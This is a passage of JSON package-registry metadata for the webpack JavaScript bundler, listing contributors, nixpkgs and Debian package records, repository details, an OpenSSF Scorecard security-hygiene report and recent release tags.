Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages_latest.webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages_latest.webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages_latest.webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages_latest.webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages_latest.webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages_latest.webpack/codemeta","maintainers":[],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":2390},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-09-02T05:05:06.554Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":13597540,"name":"node-webpack","ecosystem":"debian","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/webpack/webpack","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-11T10:32:40.278Z","latest_release_published_at":"2026-02-11T10:32:40.278Z","latest_release_number":"3.5.6-3.1","last_synced_at":"2026-03-13T15:06:14.597Z","created_at":"2026-02-11T10:32:40.090Z","updated_at":"2026-08-23T02:26:01.360Z","registry_url":"https://tracker.debian.org/pkg/node-webpack","install_command":"apt-get install node-webpack","documentation_url":"https://packages.debian.org/buster/node-webpack","metadata":{"component":"main","architecture":"all","priority":"extra","binary":"webpack","standards_version":"4.1.3","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper (\u003e= 11), nodejs, mocha, node-should, node-sinon, node-acorn (\u003e= 5.0~), node-acorn-dynamic-import (\u003e= 2.0~), node-ajv (\u003e= 5.0~), node-ajv-keywords (\u003e= 2.0~), node-async (\u003e= 0.8~), node-enhanced-resolve (\u003e= 3.4~), node-escope, node-interpret (\u003e= 1.0~), node-json-loader (\u003e= 0.5.4~), node-json5 (\u003e= 0.5~), node-loader-runner (\u003e= 2.3~), node-loader-utils (\u003e= 0.2~), node-memory-fs (\u003e= 0.4.1~), node-mkdirp (\u003e= 0.5~), node-libs-browser (\u003e= 2.0~), node-source-map (\u003e= 0.5.3~), node-supports-color (\u003e= 4.2.1~), node-tapable (\u003e= 0.2.7~), node-uglifyjs-webpack-plugin, node-watchpack (\u003e= 1.3.1~), node-webpack-sources (\u003e= 1.0.1~), node-yargs (\u003e= 6.0~), node-lodash-packages, node-lodash","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad